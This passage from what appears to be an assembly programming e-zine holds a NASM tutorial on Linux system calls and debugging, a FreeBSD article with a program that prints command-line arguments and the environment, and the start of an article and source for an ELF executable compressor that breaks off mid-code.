this data does not change at runtime. The NASM documentation has a good
description of how to use the db,dd,etc instructions that are used in this
section.
The .bss section
----------------
This section is where you declare your variables.
They look something like this:
filename: resb 255 ; REServe 255 Bytes
number: resb 1 ; REServe 1 Byte
bignum: resw 1 ; REServe 1 Word (1 Word = 2 Bytes)
longnum: resd 1 ; REServe 1 Double Word
pi: resq 1 ; REServe 1 double precision float
morepi: rest 1 ; REServe 1 extended precision float
The .text section
-----------------
This is where the actual assembly code is written. The term "self modifying
code" means a program which modifies this section while being executed.
In The Beginning ...
--------------------
The next thing you probably noticed while looking at the source to various
assembly programs, there always seems to be "global _start" or something
similar at the beginning of the .text section. This is the assembly
program's
way of telling the kernel where the program execution begins. It is exactly,
to
my knowledge, like the main function in C, other than that it is not a
function, just a starting point.
The Stack and Stuff
-------------------
Also like in C, the kernel sets up the environment with all of the
environment
variables, and sets up **argv and argc. Just in case you forgot, **argv is
an
array of strings that are all of the arguments given to the program, and
argc
is the count of how many there are. These are all put on the stack. If you
have taken Computer Science 101, or read any type of introductory computer
science book, you should know what a stack is. It is a way of storing data
so
that the last thing you put in is the first that comes out. This is fine and
dandy, but most people don't seem to grasp how this has anything to do with
their computer. "The stack" as it is ominously referred too, is just your
RAM.
That's it. It is your RAM organized in such a way, so that when you "push"
something onto "The stack", all you are doing is saving something in RAM.
And
when you "pop" something off of "The stack", you are retrieving the last
thing
you put in, which is on the top.
Ok, now let's look at some code that you are likely to see.
section .text ; declaring our .text segment
global _start ; telling where program execution should
start
_start: ; this is where code starts getting exec'ed
pop ebx ; get first thing off of stack and put into
ebx
dec ebx ; decrement the value of ebx by one
pop ebp ; get next 2 things off stack and put into
ebx
pop ebp
What does this code do? It simply puts the first actual argument into the
ebx
register. Let's say we ran the program on the command line as so:
$ ./program 42 A
When where are on the _start line, the stack looked something like this:
-----------
| 3 | The number of arguments, including argv[0],
| | which is the program name
-----------
|"program"| argv[0]
-----------
| "42" | argv[1] NOTE: This is the character "4" and "2",
| | not the number 42
-----------
| "A" | argv[2]
-----------
So, the first instruction, "pop ebx", took the 3, and put it into ebx.
Then we decrement it by one, because the program name isn't really an
argument.
Depending on if you need to later use the argument count later on, you will
see
other arguments put into either the same register or a different one.
Now, "pop ebp" puts the program name into ebp, and then the next "pop ebp"
overwrites it, and puts "42" into ebp. The last value of ebp is not
preserved,
and since you have popped it off of the stack, it is gone forever.
Doing more interesting things
-----------------------------
Moving on, how exactly do you interact with the rest of the system? You know
how to manipulate the stack, but how to you get the current time, or make a
directory, or fork a process, or any other wonderful thing a Unix box can
do? I
am pleased to introduce you to the "system call". A system call is the
translator that lets user-land programs (which is what you are writing),
talk to
the kernel, who is in kernel-land, of course. Each syscall has a unique
number,
so that you can put it into the eax register, and tell the kernel "Yo, wake
up
and do this", and it hopefully will. If the syscall takes arguments, which
most
do, these go into ebx,ecx,edx,esi,edi,ebp , in that order.
Some example code always helps:
mov eax,1 ; the exit syscall number
mov ebx,0 ; have an exit code of 0
int 80h ; interrupt 80h, the thing that pokes the
; kernel and says, "do this"
The preceding code is equivalent to having a "return 0" at the end of your
main
function. Ok, ok, still not very useful, but we are getting there.
A more useful example:
pop ebx ; argc
pop ebx ; argv[0]
pop ebx ; the first real arg, a filename
mov eax,5 ; the syscall number for open()
; we already have the filename in ebx
mov ecx,0 ; O_RDONLY, defined in fcntl.h
int 80h ; call the kernel
; now we have a file descriptor in eax
test eax,eax ; lets make sure it is valid
jns file_function ; if the file descriptor does not have the
; sign flag ( which means it is less than 0
)
; jump to file_function
mov ebx,eax ; there was an error, save the errno in ebx
mov eax,1 ; put the exit syscall number in eax
int 80h ; bail out
Now we are starting to get somewhere. You should be starting to realize that
there is no black magic or voodoo in assembly programming, just a very
strict
set of rules. If you know how the rules work, you can do just about
everything. Though I haven't tried it, I have seen network coding in
assembly,
console graphics ( intros! ), and yes, even X windows code in assembly.
So where do find out all of the semantics for all of the various system
calls?
Well first, the numbers are listed in asm/unistd.h in Linux, and
sys/syscall.h
in the *BSD's. To find out information about each one, such as what
arguments
they take and what values they return, look no further that your man pages!
I
will hold your hand in finding out about the next syscall we are going to
use,
read().
"man read" didn't give you exactly what you wanted did it? That is because
program manuals and shell manuals are shown before the programming manuals
are.
If you are using bash, you probably are looking at the BASH_BUILTINS(1) man
page. To get to what you really want, try "man 2 read". Now you should be
looking at sections like SYNOPSIS, DESCRIPTION, DESCRIPTION, ERRORS and a
few
others. These are the most important. Take a look at synopsis, it should
look
like:
ssize_t read(int fd, void *buf, size_t count);
NOTE: ssize_t and size_t are just integers.
The first argument is the file descriptor, followed by the buffer, and then
how
many bytes to read in, which should be however long the buffer is. For the
best
performance, use 8192, which is 8k, as your count. Make your buffer a
multiple
of this, 8192 is fine. Now you know what to put in your registers. Reading
the
RETURN VALUE section, you should see how read() returns the number of bytes
it
read, 0 for EOF, and -1 for errors.
file_function:
mov ebx,eax ; sys_open returned file descriptor into eax
mov eax,3 ; sys_read
; ebx is already setup
mov ecx,buf ; we are putting the ADDRESS of buf in ecx
mov edx,bufsize ; we are putting the ADDRESS of bufsize in
edx
int 80h ; call the kernel
test eax,eax ; see what got returned
jz nextfile ; got an EOF, go to read the next file
js error ; got an error, bail out
; if we are here, then we actually read some
; bytes
Now we have a chunk of the file read ( up to 8192 bytes ), and sitting in
what
you would call an array in C. What can you do now? Well, the first thing
that
comes to mind is print it out. Wait a sec, there is no man page for printf
in
section 2. What's the deal? Well, printf is a library function, implemented
by
good ol' libc. You are going to have to dig a little deeper, and use
write().
So now you looking at the man page. write() writes to a file descriptor.
What
the hell good does that do me? I want to print it out! Well, remember,
everything in Unix is a file, so all you have to do is write to STDOUT. From
/usr/include/unistd.h, it is defined as 1 . So the next chunk of code looks
like:
mov edx,eax ; save the count of bytes for the write
syscall
mov eax,4 ; system call for write
mov ebx,1 ; STDOUT file descriptor
; ecx is already set up
int 80h ; call kernel
; for the program to properly exit instead of segfaulting right here
; ( it doesn't seem to like to fall off the end of a program ), call
; a sys_exit
mov eax,1
mov ebx,0
int 80h
What you have now just written is basically "cat", except it only prints the
first 8192 bytes.
Portability
-----------
In the preceding section, you saw how the call the kernel in Linux with
NASM.
This is fine if you are never ever going to use another operating system,
and
you enjoy looking up the system kernel numbers, but is not very practical,
and
extremely unportable. What to do? There is a great little package called
asmutils started by Konstantin Boldyshev, who runs
http://www.linuxassembly.org. If you haven't read all of the good
documentation
on that site, that should be your next step. Asmutils provides an easy to
use
and portable interface to doing system calls in whichever Unix variant you
use
( and even has support for BeOS.) Even if you aren't interesting in using
these Unix utilities that are rewritten in assembly, if you want to write
portable NASM code, you are better off using it's header files than rolling
your own. With asmutils, your code will look like this:
%include "system.inc" ; all the magic happens here
CODESEG ; .text section
START: ; always starts here
sys_write STDOUT,[somestring],[strlen]
END ; code ends here
This is much more readable then doing everything by system call number, and
it
will be portable across Linux,FreeBSD,OpenBSD,NetBSD,BeOS and a few other
lesser known OS's. You can now use system calls by name, and use standard
constants like STDOUT or O_RDONLY, just like in C. The "%include" statement
works precisely as it does in C, sourcing the contents of that file.
To learn more about how to use asmutils, read the Asmutils-HOWTO, which is
in
the doc/ directory of the source. Also, to get the latest source, use the
following commands:
export CVS_RSH=ssh
cvs -d:pserver:anonymous@...:/cvsroot/asm login
cvs -z3 -d:pserver:anonymous@...:/cvsroot/asm co asmutils
This will download the newest, bleeding edge source into a subdirectory
called
"asmutils" of your current directory. Take a look at some of the simpler
programs, such as cat,sleep,ln,head or mount, you will see that there isn't
anything horrendously difficult about them. head was my first assembly
program,
I made extra comments on purpose, so that would be a good place to start.
Debugging
---------
Strace will definitely by your friend. It is the easiest tool to use to
debug
your problem. Most of the time when writing in assembly, other that syntax
errors, you will just get a segmentation fault. This provides you with a
ZERO
useful information. With strace, at least you will see after which system
call
your program is choking. Example:
$ strace ./cal2
execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0
read(1, "", 0) = 0
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
Now you know to look after your first read system call. But it starts
getting
tricky when you have lots of pure assembly, which strace cannot show. That's
when gdb comes into play. There is some very good information about using
gdb
and enabling debugging information in NASM in the Asmutils-HOWTO, so I won't
reproduce it here. For a quick and dirty solution, you could do something
like
this:
%define notdeadyet sys_write STDOUT,0,__LINE__
Now you can litter the source with notdeadyet's, and hopefully see where
things
are going astray with the help of strace. Obviously this is not practical
for
complex bugs or voluminous source, but works great for finding careless
mistakes when you are starting out. Example:
$ strace ./cal2
execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0
write(1, NULL, 16) = 16
write(1, NULL, 26) = 26
write(1, NULL, 41) = 41
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
Now we know that we are still going on line 41, and the problem is after
that.
Next ?
------
Now it is your turn to explore the insides of your operating system, and
take
pride in understanding what's really going on under the covers.
Reference
---------
Places to get more information:
Linux Assembly - http://www.linuxassembly.org
NASM Manual ( available in doc/html directory of source )
Assembly Programming Journal - http://asmjournal.freeservers.com/
Mammon_'s textbase -
http://www.eccentrica.org/Mammon/sprawl/textbase.html
Art Of Assembly - http://webster.cs.ucr.edu/Page_asm/ArtOfAsm.html
Sandpile - http://www.sandpile.org
comp.lang.asm.x86
NASM - http://www.cryogen.com/Nasm
Asmutils-HOWTO - doc/ directory of asmutils
Feedback
--------
Feedback is welcome, hopefully this was of some use to budding Unix assembly
programmers.
Availability
------------
The most current version of this document should be available at
http://www.leto.net/papers/writing-a-useful-program-with-nasm.txt .
Appendix : Jumps
----------------
When I first began looking at assembly source code, I saw all these crazy
instructions like "jnz" and the like. It looked like I was going to have to
remember the names of a whole slew of inanely named instructions. But after
a
while it finally clicked what they all were. They are basically just "if
statements" that you know and love, that work off of the EFLAGS register.
What
is the EFLAGS register? Just a register with lots of different bits that are
set to zero or one, depending on the previous comparison that the code made.
Some code to set the stage:
mov eax,82
mov ebx,69
test eax,ebx
jle some_function
What on earth is "jle"? Why it's "Jump if Less than or Equal." If eax was
less
than or equal to ebx, code execution will jump to "some_function", if not,
it
keeps chugging along. Here is a list which will hopefully shed some light on
this part of assembly that was mysterious to me when I began. Some of these
are
logically the same, but are provided because is some situations one will be
more intuitive than the other.
Jump Meaning Signedness (S or U)
-----------------------------------------------------------
ja | Jump if above | U
jae | Jump if above or Equal | U
jb | Jump if below | U
jbe | Jump if below or Equal | U
jc | Jump if Carry |
jcxz | Jump if CX is Zero |
je | Jump if Equal |
jecxz | Jump if ECX is Zero |
jz | Jump if Zero |
jg | Jump if greater | S
jge | Jump if greater or Equal | S
jl | Jump if less | S
jle | Jump if less or Equal | S
jmp | Unconditional jump |
jna | Jump Not above | U
jnae | Jump Not above or Equal | U
jnc | Jump if Not Carry |
jncxz | Jump if CX Not Zero |
jne | Jump if Not Equal |
jng | Jump if Not greater | S
jnge | Jump if Not greater or Equal | S
jnl | Jump if Not less | S
jnle | Jump if Not less or Equal | S
jno | Jump if Not Overflow |
jnp | Jump if Not Parity |
jns | Jump if Not signed |
jnz | Jump if Not Zero |
jo | Jump if Overflow |
jp | Jump if Parity |
jpe | Jump if Parity Even |
jpo | Jump if Parity Odd |
js | Jump if signed |
jz | Jump if Zero |
-----------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Command Line in
FreeBSD
by G. Adam Stanislav
In my Issue 8 article I mentioned I did not know how command line parameters
(or arguments) were passed to programs under FreeBSD. I have received some
feedback, both from the FreeBSD community and APJ readers.
Thanks to that feedback, I can now pass this information on to you. Further,
this information should be valid, more or less, for all 386 based Unix and
Unix-like operating systems. At any rate, if your Unix variety does not come
with the information on its command line parameters, chances are that, if
you
adjust my sample code to use the kernel interface of your OS, it will work
just
fine.
Code startup
------------
Unix is much more security-conscious than MS DOS and MS Windows. While
DOS/Windows assembly language programmers may be used to the operating
system
loading their code and then CALLing it (so you can exit with a simple RET,
and
possibly crash the system), Unix creates a new process for each program.
This
process is separate from the kernel and from all other processes. Hence, the
system does not CALL your code, it JMPs to it. If you issue a RET, you will
crash your program, but Unix will continue running unharmed. At least that's
the theory. However, under FreeBSD it is the practice as well: I tried it
and
can vouch for it.
The top of the stack
--------------------
Before the Unix system jumps to your code, it pushes some information on the
top of the stack: Your stack, that is, not system stack, so you can access
it
all from your own code. Here is what the stack contains, starting at the
top:
number of arguments ("argc")
argument 0
argument 1
...
argument n (n = argc - 1)
NULL pointer
environment 0
environment 1
...
environment n
NULL pointer
Not all of these are necessarily there (e.g., if the program was called with
no
arguments). However, the number of arguments, argument 0, and the two NULL
pointers are always present.
Argument 0 is not a command line parameter in the sense DOS programmers are
used to find. Instead, it is the name of the program. C programmers will
find
it as the familiar argv[0].
Another important difference between DOS and Unix is that DOS programs just
give you the full command line, i.e., whatever appears after the name of the
program, including any leading and trailing blanks. It is then up to the
programmer to strip all extra blanks.
Compared to that, parsing the Unix command line is much simpler as the
system
does some of the hard work for you. The individual arguments are separated,
and
usually contain no leading/trailing blanks. When they do, they are there
because the program caller wanted them there.
Let me illustrate. Suppose the user has typed the following command:
./args Hello, world. Here I come!
In that case, the top of the stack will look like this:
6
./args
Hello,
world.
Here
I
come!
0
environment 0
environment 1
...
environment n
0
The arguments are nicely separated and contain no blanks. Now, suppose the
user
has typed:
./args Hello, world. "Here I come!"
The top of the stack looks like this:
4
./args
Hello,
world.
Here I come!
0
(etc)
This system, besides making it easier to parse, has a great advantage over
the
DOS way: It has no practical limit on the size of the command line.
Accessing the information
-------------------------
Because your program runs in its own process space, the stack is yours to do
with as you please. You can simply save the information in some data
structure
and leave the stack intact, or you can pop it off as you need it.
The C startup code uses the first approach: It saves the "argc" value in a
local variable, the argument 0 in another. It finds the start of the
environment variable list and stores it in a global variable. It then calls
main, passing that information to it, i.e. main(argc, *argv[], env);
The assembly language program can do that as well, but usually has no need
to.
If you process the command line at the start of your code, and never need to
see it again, you can just pop it off the stack one by one, analyze it, set
up
any flags or other variables, etc.
I have enclosed a simple assembly language program called args.asm below.
All
it does is print all the information the FreeBSD system has passed to it. It
is
useful as an example of one way of accessing the command line arguments (and
the environment) by simply popping it off one at a time.
It is also useful as a tool to study what format the arguments are in. For
example, running it will show you that the environment is passed to your
program in the form of name=value, where name is the name of the environment
variable, value is whatever text string is assigned to it.
You can assemble and link the program with NASM:
nasm -f elf args.asm
ld -o args args.o
strip args
Try running it with and without command line arguments. Try placing the
arguments in single and double quotes, try all the nifty things a Unix shell
will let you do, such as:
./args $HOME
./args `ls -la`
./args "`ls -la`"
./args '`ls -la`'
./args
./args Hello, world. Here I come!
./args Hello, world. "Here I come!"
./args ' Hello, world. Here I come ! '
;-----------------------------------------------------------------------------;
; args.asm
;
; Print FreeBSD command line arguments and environment
;
; Copyright 2000 G. Adam Stanislav
; All rights reserved
;-----------------------------------------------------------------------------;
section .data
prgmsg db 'Program name:', 0Ah, 0Ah
tab db 9
prglen equ $-prgmsg
argmsg db 0Ah, 0Ah, 'Command line arguments:', 0Ah, 0Ah
arglen equ $-argmsg
envmsg db 0Ah, 'Environment variables:', 0Ah, 0Ah
envlen equ $-envmsg
huhmsg db "Hmmm... Something's wrong here...", 0Ah
huhlen equ $-huhmsg
section .code
what.the.heck:
; Print the huhmsg to stderr and abort.
push dword huhlen
push dword huhmsg
sub eax, eax
mov al, 2 ; stderr
push eax
add al, al ; SYS_write
push eax
int 80h
; No need to clean up the stack since we're quitting now.
sub eax, eax
inc al ; return 1 (failure), SYS_exit
push eax
push eax
int 80h
; ELF programs always start at _start
global _start
_start:
; We come here with "argc" on the top of the stack. Its value
; is at least 1. If not, something went seriously wrong.
pop ecx ; ECX = argc
jecxz what.the.heck
; Print the prgmsg
sub eax, eax
push dword prglen
push dword prgmsg
inc al ; stdout
push eax
push eax
mov al, 4 ;SYS_write
int 80h
add esp, byte 16
; Get argv[0], i.e., the program path
pop ebx ; EBX = argv[0]
; argv[0] is a NUL-terminated string. We can find its
; length by scanning for the NUL.
sub eax, eax
sub ecx, ecx
cld
dec ecx
mov edi, ebx
repne scasb
not ecx
dec ecx
; Print the string
push ecx
push ebx
inc al ; stdout
push eax
push eax
mov al, 4
int 80h
add esp, byte 16
; Print the argmsg
sub eax, eax
push dword arglen
push dword argmsg
inc al ; stdout
push eax
push eax
mov al, 4 ; SYS_write
int 80h
add esp, byte 16
; By now, we have no idea what the value of argc was.
; We did not save it because we don't need it.
; The top of the stack now contains pointers
; to command line arguments (if any), followed
; by a NULL pointer.
;
; We simply print everything before the NULL.
.argloop:
pop ebx ; next argument
or ebx, ebx
je .env ; NULL pointer
; Print a tab
sub eax, eax
inc al
push eax
push dword tab
push eax ; stdout
mov al, 4 ; SYS_write
push eax
int 80h
add esp, byte 16
; Find the length
sub ecx, ecx
sub eax, eax
dec ecx
mov edi, ebx
repne scasb
not ecx
; Append a new line
mov byte [edi-1], 0Ah
; Print the string
push ecx
push ebx
inc al ; stdout
push eax
mov al, 4 ; SYS_write
push eax
int 80h
add esp, byte 16
jmp short .argloop ; next
.env:
; Print the envmsg
sub eax, eax
push dword envlen
push dword envmsg
inc al ; stdout
push eax
push eax
mov al, 4 ; SYS_write
int 80h
add esp, byte 16
; The top of the stack now contains pointers to
; environment variables, followed by a NULL pointer.
; We do what we did for the arguments:
.envloop:
pop ebx
or ebx, ebx
je .exit
sub eax, eax
inc al
push eax
push dword tab
push eax
mov al, 4
push eax
int 80h
add esp, byte 16
sub ecx, ecx
sub eax, eax
dec ecx
mov edi, ebx
repne scasb
not ecx
mov byte [edi-1], 0Ah
push ecx
push ebx
inc al
push eax
mov al, 4
push eax
int 80h
add esp, byte 16
jmp short .envloop
.exit:
sub eax, eax ; return 0 (success)
push eax
inc al ; SYS_exit
push eax
int 80h
;--- End of program
----------------------------------------------------------;
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Compressing
data
by Feryno
Gabris
First, intro about decompress. It's needed a routine called "get_next_bit".
Here are 3 examples:
;-----
get_next_bit:
add dl,dl
jnz no_new_byte
lodsb
mov dl,al
adc dl,dl
no_new_byte:
ret
;-----
get_next_bit:
shl bx,1
jnz no_new_word
mov bx,word [esi]
inc esi
inc esi
rcl bx,1
no_new_word:
ret
;-----
get_next_bit:
shl ebp,1
jnz no_new_dword
lodsd
rcl eax,1
xchg ebp,eax
no_new_dword:
ret
;-----
And this is the usage of get_next_bit:
;-----
mov esi,control_bits_offset
mov edi,place_for_store_decompressed_bytes
cld
mov dl,80h
B0: call get_next_bit
jc L1
L0: ... some decompress instructions ...
jmp B0
L1: ... some decompress instructions ...
jmp B0
get_next_bit:
add dl,dl ; this is instruction for put next bit to
Carry
; highest bit will be become to Carry Flag
and
; all lower bits are shifted left by 1
jnz no_new_byte
; next 3 instructions handle: all control_bits are processed and removed
lodsb ; load new control_byte with 8 control_bits
xchg edx,eax ; swap to another register only
adc dl,dl ; puth highest control_bit to Carry
; shift all bits left by 1
; recycle highest bit by MOV DL,80h ( bit=1
; become to lower bit (bit 0.) )
no_new_byte:
ret
;-----
Note about two instructions: MOV DL,80h and ADC DL,DL.
MOV DL,80h set up first control_bit, but this isn't true control_bit used
for
switch decompress between L0 and L1. Binary, 80h = 10000000b and highest bit
(bit 7.) of 80h is bit=1 . All other bits=0 (bits 6. 5. 4. 3. 2. 1. 0.).
Highest bit name can be as helper_control_bit. Helper_control_bit is never
destroyed until decompress process ends. Helper_control_bit recycle through
instruction ADC DL,DL after each loaded bits (8 bits by LODSB, 32 by LODSD)
are
used (after 8 times call get_next_bit with LODSB - 1st example procedure or
32 times call get_next_bit with LODSD 3nd example procedure).
Image of first call get_next_bit and call get_next_bit after use and remove
all
control_bits is similar:
Status is: DL register = 80h = 10000000b
Here is instructions run:
1. ADD DL,DL
80h + 80h = 00h CarryFlag=1 ZeroFlag=1 (in Carry is
helper_control_bit)
2. LODSB
load control_byte with 8 control_bits, this instruction dont touch
Carry
3. XCHG EDX,EAX
swap control_byte to DL register, this instruction don't touch Carry
(note that instructions PUSH,POP,MOV,XCHG,INC,LODSB,... don't change
Carry)
4. ADC DL,DL
recycle helper_control_bit, shift all bits left by 1 and new highest
control_bit become to Carry
This may be the most difficult part of decompress for understand. OK,
next...
Instructions on L0 and L1 can be as:
L0: MOVSB
JMP B0
L1: ... calculate ECX
... calculate EBX (delta, shift)
PUSH ESI
MOV ESI,EDI
SUB ESI,EBX
REPZ MOVSB
POP ESI
JMP B0
First mode, L0, isn't true decompress mode. Byte isn't compressed and it
will
be moved only. This mode has bad pack ratio, but must be used for store some
bytes that can't be decompressed by L1 mode. It use 1 byte + 1 bit = 9 bits
for
store 1 byte = 8 bits.
Second mode, L1, is true decompress mode. It calculate ECX number of bytes
for
decompress and calculate EBX, value that can be named as DELTA or SHIFT.
This
assume that chain of ECX bytes is on positions [EDI] and [EDI-EBX] in DATA
bytes and ASM code like:
MOV ESI,EDI
SUB ESI,EBX
REPZ CMPSB
In data bytes compression process return with ZeroFlag=1 and ECX=0.
It has good pack ratio, better for large chains (big ECX) and small shift
(small EBX). Methods for calculate ECX and EBX are similar:
It's lucid that ECX as well EBX aren't zero (ECX<>0 EBX<>0) hence highest
bit
of register is bit=1.
First instruction for calculate ECX setup highest bit=1 and all next bits
will
be put by call get_next_bit. First instruction is:
MOV ECX,1
or INC ECX if ECX=0.
Next instructions are:
CALL GET_NEXT_BIT
ADC ECX,ECX ; as well RCL ECX,1 can be used
How to terminate calculate ECX ? Again through use call get_next_bit !
Here is full routine for calculate ECX in decompress:
MOV ECX,1
LCC0: CALL GET_NEXT_BIT
ADC ECX,ECX
CALL GET_NEXT_BIT
JC LCC0
A minimal value ECX=2 can be produced by this code. ECX=1 isn't needed
because
this handle L0 mode (MOVSB) and L0 is more rational (but has bad pack ratio)
for pack 1 byte as L1 mode.
Example for calculate ECX=5=101b
Highest bit is by INC ECX and i remove it - binary 01b
Bit sequence for calculate ECX=5 is 01 10 binary.
Calculate ECX=110100b
Remove highest bit (this bit put INC ECX in decompress) - binary 10100b
Bit sequence for calculate ECX is 11 01 11 01 00 binary.
Calculate ECX=2=10b. Bit sequence is 0 0 binary.
Calculate ECX=3=11b. Bit sequence is 1 0 binary.
Calculate ECX=4=100b. Bit sequence is 0 1 0 0 binary.
Calculate ECX=5=101b. Bit sequence is 0 1 1 0 binary.
Calculate ECX=6=110b. Bit sequence is 1 1 0 0 binary.
Calculate ECX=7=111b. Bit sequence is 1 1 1 0 binary.
Calculate ECX=8=1000b. Bit sequence is 0 1 0 1 0 0 binary.
Calculate ECX=16=10000b. Bit sequence is 0 1 0 1 0 1 0 0 binary.
Calculate ECX=17=10001b. Bit sequence is 0 1 0 1 0 1 1 0 binary.
Calculate ECX=18=10010b. Bit sequence is 0 1 0 1 1 1 0 0 binary.
Calculate ECX=19=10011b. Bit sequence is 0 1 0 1 1 1 1 0 binary.
Calculate EBX has some similar steps but some other steps.
EBX can be EBX=1 and can be done as:
MOV EBX,1
LCD0: CALL GET_NEXT_BIT
ADC EBX,EBX
CALL GET_NEXT_BIT
JC LCD0
DEC EBX
But by experients, it's often EBX>16 and for EBX<16 can be used another
decompress mode. Calculate EBX=15 require 8 bits = 1 byte by use upper
codes.
It's a better use 8 bits = 1 byte for fill BL in EBX and calculate all bits
highest of BL ( bits 31. - 8. ) by mode similar as calculate ECX.
Here is it:
MOV EBX,1
LCD0: CALL GET_NEXT_BIT
ADC EBX,EBX
CALL GET_NEXT_BIT
JC LCD0
DEC EBX
DEC EBX
SHL EBX,8
MOV BL,byte [ESI]
INC ESI
Note that at least 2 times DEC EBX must be used for make EBX=0 possibility
before SHL EBX,8 shift all bits higher and free BL.
It's a mode named without_change_delta. Principle is 3 times use DEC EBX
after
calculate EBX=2. Calculate EBX=-1 indicate that calculate new delta isn't
needed and old delta can be used. Old delta can be saved to unused register
or
stack by previous SUB ESI,EBX REPZ MOVSB and restored by mode
without_change_delta.
Principle of mode for pack 2-3 bytes with delta from 1 to 7Fh:
1. Load 1 byte = 8 bits
2. bit 0. = 1 indicate packed 2 bytes
bit 0. = 0 indicate packed 3 bytes
3. high 7 bits ( bits 7. - 1. ) is delta
Here is code example
XOR EBX,EBX ; (EBX=0)
MOV ECX,1 ; (ECX=1)
MOV BL,[ESI]
INC ESI
SHR BL,1 ; this explore bit 0. and shift bits to make
EBX=delta
SBB CL,0
INC ECX
INC ECX
It's lucid that result BL=0 after this code is impossible delta. I make use
of
this for TERMINATE decompress process.
A nice idea for pack 1 byte with delta from 1 to 15:
XOR EBX,EBX
MOV ECX,1
U02: MOV BL,00010000b
CALL GET_NEXT_BIT
ADC BL,BL
JNC U02
Result EBX=0 is impossible delta and is used for pack byte 00h. This byte
00h
is the most frequent byte in 32-bit opcodes. Last code continue...
JNZ STORE_1_BYTE
XCHG EBX,EAX ; make EAX=0 in 1 byte 32-bit opcode
JMP STORE_BYTE
...
STORE_1_BYTE:
NEG EBX
MOV AL,[EDI+EBX]
STORE_BYTE:
STOSB
This is all about decompress intro. It's a part not implemented in
decompress
meanwhile. This is part like:
CMP EBX,7D00h
JNC ZVYS_O_DVE
CMP EBX,500h
JNC ZVYS_O_JENNU
JMP NYST_NEZVYSUJ
ZVYS_O_DVE: INC ECX
ZVYS_O_JENNU: INC ECX
NYST_NEZVYSUJ:
It's not rational compress 2 bytes with delta > 4FFh because this request
2+(3*2)+8+2 = 18 bits and this can be done with 2 times use MOVSB mode
(2*9=18
bits).
U00: movsb ; require 1 byte = 8 bits
call get_next_bit ; require 1 bit
jnc U00
It's rational compress 4 bytes with delta > 7CFFh because this request
2+(8*2)+8+(2*2) = 28 bits without, 26 bits with this implementation.
Intro for COMPRESS...
---------------------
Some equivalents:
DECOMPRESS COMPRESS
MOV DL,80h CALL o_c_0 ; setup helper_control_bit
CALL GET_NEXT_BIT CALL PUT_BIT
Routines for scan chains, calculate bit request for pack this chain, pack
chain, some optimalizations for found better chains are in source code.
Source is ELF compressor, but this isn't universal ELF compressor. It
support
ELF header included in the source only. This header is enough for LINUX NASM
use. You can download sources as well binaries from:
http://feryno.home.sk/projects/compressELF.tar.gz
; ----- CUT HERE -----
; fy1ename: a00.asm
; dezkrypt: ASM, ELF, k0mprezz0r, myny, exekutab1e
; Au~tchor: ch lap aj Feryno
; kompy1e:
; nasm -f bin a00.asm
; chmod +x a00
; example of use
; ./a00 a00 compressed_a00
; this self compress compressor
BITS 32
org 08048000h
ehdr: ; Elf32_Ehdr
db 7Fh, 'ELF', 1, 1, 1 ; e_ident
times 9 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd START ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
phdr: ; Elf32_Phdr
dw 1 ; e_phnum ; p_type
dw 0 ; e_shentsize
dw 0 ; e_shnum ; p_offset
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd memsize ; p_memsz
dd 111b ; p_flags
; EWR
;Exec,Write,Read
dd 1000h ; p_align
phdrsize equ $ - phdr
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
START:
pop ebx ; pop number of strings in comand line , must be =3
dec ebx
dec ebx
dec ebx ; set zero flag if after this EBX=0
pop ebx ; offset of first string ( executable file )
jz short mode ; number of strings = 3 = executable + file0 +
file1
use: mov ecx,usage
xor edx,edx
mov dl,usagesize
;;; call WS
jmp short ex00
mode: pop ebx ; pop offset of second string (first string, 0,
second
; string, 0, third...)
open: mov edi,f0h
cld
; ebx is now pointed to second string in a shell = in_file
open_f: xor ecx,ecx ; open flags, open for read-only
; xor eax,eax
; mov al,5 ; sys_open
db 6Ah,5 ; push dword 5
pop eax
int 80h ; open , note - return HANDLE in EAX
or eax,eax
jns short OK_open
mov ecx,MEOF
; xor edx,edx
; mov dl,MEOFS
db 6Ah,MEOFS ; push dword MEOFS
pop edx
;;; call WS
ex00: jmp short ex01
OK_open:stosd ; store file handle
pop ebx ; EBX pointed to second filename out_file
mov ecx,111101101b ; 111 owner can read, write, execute, 101
group
can read, execute, but don't write / search, other 101 as well groups
; xor eax,eax
; mov al,8 ; sys_creat
db 6Ah,8 ; push dword 8
pop eax
int 80h ; creat , note - return HANDLE in EAX
or eax,eax
jns short OK_creat
mov ecx,MECF
; xor edx,edx
; mov dl,MECFS
db 6Ah,MECFS ; push dword MECFS
pop edx
;;; call WS
ex01: jmp short ex02
OK_creat:stosd ; store file handle
; EDI=f0s
mov ebx,dword [edi - 4*2] ; handle for in_file
xor ecx,ecx ; ECX=0 seek 0 bytes
; xor edx,edx
; inc edx
; inc edx ; EDX=2 seek to end of file + ECX=0 bytes
db 6Ah,2 ; push dword 2
pop edx
; xor eax,eax
; mov al,13h ; sys_seek
db 6Ah,19 ; push dword 19
pop eax
int 80h ; note - return filesize in EAX
or eax,eax
jns short OK_seek_to_end
mov ecx,MSEEF
; xor edx,edx
; mov dl,MSEEFS
push byte MSEEFS
pop edx
;;; call WS
ex02: jmp short ex03
OK_seek_to_end:
;;; or eax,eax
;;; jz ex04 ; filesize=0 -> this file needn't compression
cmp eax,f0b_size
jnbe ex04 ; LIMIT f0b_size OVERFLOW !!!!!!
cmp eax,4Ch
jbe ex04 ; can't be a ELF executable, ELF header require 4C
; bytes
stosd ; store in_file size to f0s_2
stosd ; store in_file size to f0s
push eax ; and push it to stack
xor ecx,ecx ; seek 0 bytes
